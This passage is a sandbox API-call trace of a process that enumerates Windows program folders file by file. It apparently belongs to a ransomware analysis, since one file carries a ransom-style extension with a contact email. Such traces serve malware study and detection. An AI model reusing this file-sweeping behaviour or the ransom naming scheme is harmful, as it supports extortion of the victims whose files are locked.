lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.850] FindNextFileW (in: hFindFile=0x43a2a18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.850] FindClose (in: hFindFile=0x43a2a18 | out: hFindFile=0x43a2a18) returned 1 [0178.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.850] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0178.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.851] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0178.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.851] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0178.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0178.851] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0178.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.851] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0178.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.853] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 0 [0178.853] FindClose (in: hFindFile=0x43a2ad8 | out: hFindFile=0x43a2ad8) returned 1 [0178.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0178.854] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0178.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.854] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0178.855] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.855] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0178.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.856] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0178.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.856] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0178.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.856] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0178.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.857] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0178.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.858] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0178.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.858] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0178.858] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.860] FindNextFileW (in: hFindFile=0x43a2c98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0178.860] FindClose (in: hFindFile=0x43a2c98 | out: hFindFile=0x43a2c98) returned 1 [0178.860] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0178.861] FindNextFileW (in: hFindFile=0x43a2d98, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x240000, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 1 [0179.296] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe530b7f4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe530b7f4, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.296] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0179.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43b3078 [0179.296] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a28d8 [0179.297] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2dfe94, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x68e10600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3c4cb5, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 0 [0179.297] FindClose (in: hFindFile=0x43a28d8 | out: hFindFile=0x43a28d8) returned 1 [0179.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0179.298] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0179.298] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iediagcmd.exe", cAlternateFileName="")) returned 1 [0179.298] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a70c9a1, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xbc534b5e, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a70c9a1, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0179.298] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0179.299] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4c60b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x63800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0179.306] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa182b3a4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa1c0b0e4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x8ca44c00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc9340, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0179.307] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43b3078 [0179.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\images\\*", lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a3018 [0179.307] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.307] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bing.ico", cAlternateFileName="")) returned 1 [0179.307] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bing.ico", cAlternateFileName="")) returned 0 [0179.307] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0179.308] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0179.308] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0179.308] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43b3078 [0179.308] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2e18 [0179.308] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.308] FindNextFileW (in: hFindFile=0x43a2e18, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="install.ins", 